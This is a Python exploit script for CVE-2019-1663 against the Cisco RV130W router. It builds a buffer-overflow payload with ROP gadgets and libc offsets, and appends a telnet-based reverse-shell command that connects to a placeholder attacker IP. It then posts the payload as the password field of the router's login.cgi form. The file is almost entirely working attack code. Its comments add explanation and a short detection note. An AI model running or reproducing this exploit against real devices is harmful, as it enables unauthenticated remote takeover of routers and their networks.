#!/usr/bin/env python3
"""
Exploit : CVE-2019-1663
CVSS : 9.8 CRITICAL
Vector : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Target : Cisco RV130W Wireless-N Multifunction VPN Router
Author : KylVGoi
Usage : To use this exploit, update the IP address in the telnet commands.
Note : This script was developed on an emulated router. You may need to adjust the libc offsets.
"""
import struct
import requests
# --- Overflow string -------------------------------------------------------
# Every address below is computed as libc_base + offset and packed as an
# absolute 32-bit little-endian word. The module docstring says the offsets
# were taken from an emulated router and may differ on real hardware; nothing
# in this file validates them before sending.
libc_base = 0x402bb000
gadget_1_offset = 0x00005c39 # pop {r3, r4, r6, r7, pc};
gadget_2_offset = 0x00037884 # mov r0, sp; blx r3;
system_offset = 0x4d144
# Number of filler bytes placed before the first packed address.
payload_len = 446
PAYLOAD = b"A" * payload_len
# "<I" = unsigned 32-bit, little-endian.
PAYLOAD += struct.pack("<I", libc_base + gadget_1_offset)
PAYLOAD += struct.pack("<I", libc_base + system_offset)
# Three 4-byte filler words; per the gadget_1 comment above they are consumed
# by the pop sequence, their contents do not matter.
PAYLOAD += b"HACK" # JUNK (r4 from pop)
PAYLOAD += b"THIS" # JUNK (r6 from pop)
PAYLOAD += b"SHIT" # JUNK (r7 from pop)
PAYLOAD += struct.pack("<I", libc_base + gadget_2_offset)
# ...
# Command string appended after the addresses. "<IP>" is a placeholder that
# the module docstring asks the user to fill in; it is sent verbatim otherwise.
PAYLOAD += b"telnet <IP> 4444 | /bin/sh | telnet <IP> 4445;#"
# reverse shell (stdin | shell | stdout)
# Detection note: exploit() below submits PAYLOAD as the "pwd" form field of a
# login POST, so the observable on the wire is a pwd value several hundred
# bytes long that ends in a shell command string.
def exploit(target_url, payload):
    """Submit *payload* as the ``pwd`` field of a login-form POST to *target_url*.

    A plain form post (``requests.post`` with ``data=``) is sent with a
    5-second timeout. On success the HTTP status code is printed; on any
    ``requests.exceptions.RequestException`` (connection error, timeout, ...)
    the exception text is printed instead. Nothing is returned.
    """
    form_fields = {
        "submit_button": "login",
        "submit_type": "",
        "gui_action": "",
        "wait_time": "0",
        "change_action": "",
        "enc": "1",
        "user": "please-make-me-root",
        "pwd": payload,
        "sel_lang": "EN",
    }
    # Progress message (French in the original); printed before the request.
    print("\nEnvoi payload ")
    try:
        resp = requests.post(target_url, data=form_fields, timeout=5)
    except requests.exceptions.RequestException as err:
        print(f"Erreur ou timeout : {err}")
    else:
        print(f"Status: {resp.status_code}")
if __name__ == "__main__":
    # Script entry point: the host name here is the page's own placeholder
    # target; the path is the login handler the form in exploit() posts to.
    exploit("http://vpn.contoso.com/login.cgi", PAYLOAD)